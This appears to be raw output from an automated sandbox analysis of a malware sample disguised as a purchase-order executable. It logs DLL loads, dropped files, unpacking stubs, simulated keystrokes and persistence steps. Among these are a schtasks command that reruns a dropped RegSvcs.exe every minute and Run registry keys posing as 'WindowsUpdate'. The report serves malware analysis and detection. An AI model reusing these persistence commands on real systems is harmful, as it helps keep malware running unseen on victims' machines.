Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: wsock32.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: version.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: winmm.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: mpr.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: wininet.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: userenv.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: wldp.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: wsock32.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: version.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: winmm.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: mpr.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: wininet.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: userenv.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: wldp.dll
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Section loaded: ntmarta.dll

Source: C:\Users\user\Desktop\PO3311926.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Slides.lnk.32.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.32.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Google Drive.lnk.32.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.32.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.32.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.32.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: PO3311926.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PO3311926.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PO3311926.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PO3311926.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PO3311926.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PO3311926.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: PO3311926.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: PO3311926.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: PO3311926.exe
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000012.00000000.1618125774.0000000000D32000.00000002.00000001.01000000.0000000D.sdmp, RegSvcs.exe.15.dr
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000012.00000000.1618125774.0000000000D32000.00000002.00000001.01000000.0000000D.sdmp, RegSvcs.exe.15.dr

Source: PO3311926.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PO3311926.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PO3311926.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PO3311926.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PO3311926.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains potential unpacker

Source: 8.3.sdadbtvsh.bin.17b6130.0.raw.unpack, Helper.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 20.3.sdadbtvsh.bin.exe.e6f650.0.raw.unpack, Helper.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 26.3.sdadbtvsh.bin.exe.166ebd0.0.raw.unpack, Helper.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 35.3.sdadbtvsh.bin.exe.181df28.0.raw.unpack, Helper.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

Code function: 8_2_00595D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

8_2_00595D78

Source: C:\Users\user\Desktop\PO3311926.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_3940265

Jump to behavior

Source: PO3311926.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BBF640 push ecx; ret	0_2_00BBF653
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BBEB78 push eax; ret	0_2_00BBEB96
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005E0332 push edi; ret	8_2_005E0333
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005B0E06 push ecx; ret	8_2_005B0E19
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005ADBF6 push cs; iretd	8_2_005ADBFD
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00AB0332 push edi; ret	20_2_00AB0333
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A80E06 push ecx; ret	20_2_00A80E19
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A7DBFC push cs; iretd	20_2_00A7DBFD
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A7DC00 push eax; iretd	20_2_00A7DC01

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	File created: C:\Users\user\wrse\sdadbtvsh.bin	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Roaming\RegSvcs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	File created: C:\Users\user\wrse\sdadbtvsh.bin.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PO3311926.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin.exe	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegSvcs			Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate			Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe"

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdate	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegSvcs	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegSvcs	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_006225A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	8_2_006225A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005AFC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	8_2_005AFC8A
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00AF25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	20_2_00AF25A0
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A7FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	20_2_00A7FC8A

Source: C:\Users\user\Desktop\PO3311926.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
